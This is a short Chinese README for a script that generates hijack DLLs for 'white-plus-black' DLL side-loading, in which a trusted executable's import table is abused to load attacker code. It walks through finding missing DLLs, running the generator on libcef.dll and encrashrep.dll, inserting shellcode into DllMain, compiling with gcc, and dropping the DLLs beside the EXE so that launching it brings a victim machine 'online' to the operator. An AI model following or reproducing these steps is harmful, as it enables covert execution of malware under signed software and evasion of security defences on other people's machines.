快速生成用于白加黑劫持的DLL,劫持类型为导入表劫持,不需要考虑原始程序代码流程等。支持大部分程序。
完整介绍:https://9bie.org/index.php/archives/944/
使用的前提,程序必须是导入表导入的,不能是loadlibrary的,loadlibrary的不能用这个脚本,可以用其他方法处理。
直接把EXE从安装文件夹复制出来,然后双击运行,假设会出现如下报错(找不到DLL的),就说明是可以劫持的
记录下这些缺少的DLL,依次执行命令
python iat_dll_hijack.py 目标.exe libcef.dll a1.c
python iat_dll_hijack.py 目标.exe encrashrep.dll a2.c
然后修改最后一次报错dll输出的代码,修改DLLmain里面的shellcode。(重要,不然会影响程序执行流程) 然后执行gcc命令编译
gcc a1.c -lShlwapi -lPsapi -shared -o libcef.dll
gcc a2.c -lShlwapi -lPsapi -shared -o encrashrep.dll
然后把生成的dll和目标exe放在一起,双击执行即可上线
这种类型的导出DLL暂时没办法自动处理
